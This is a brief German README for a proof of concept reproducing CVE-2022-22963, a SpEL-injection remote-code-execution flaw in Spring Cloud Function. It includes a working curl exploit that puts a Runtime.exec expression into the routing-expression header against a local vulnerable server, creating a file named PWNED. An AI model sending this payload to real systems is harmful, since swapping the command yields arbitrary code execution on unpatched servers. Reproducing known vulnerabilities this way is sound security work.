
Minimaler Proof-of-Concept für CVE-2022-22963, Remote-Code-Ausführung in Spring Cloud Function durch SpEL-Injection. Zeigt die Ausnutzung mit curl und einem anfälligen Server.
Minimalbeispiel zur Reproduktion der Remote-Code-Ausführung CVE-2022-22963 in org.springframework.cloud:spring-cloud-function-core.
mvn spring-boot:run
curl -X POST -H 'spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("touch PWNED")' -d xxx http://127.0.0.1:8080/functionRouter
Als Ergebnis des Exploits wird die Datei PWNED in der Nähe von pom.xml erstellt.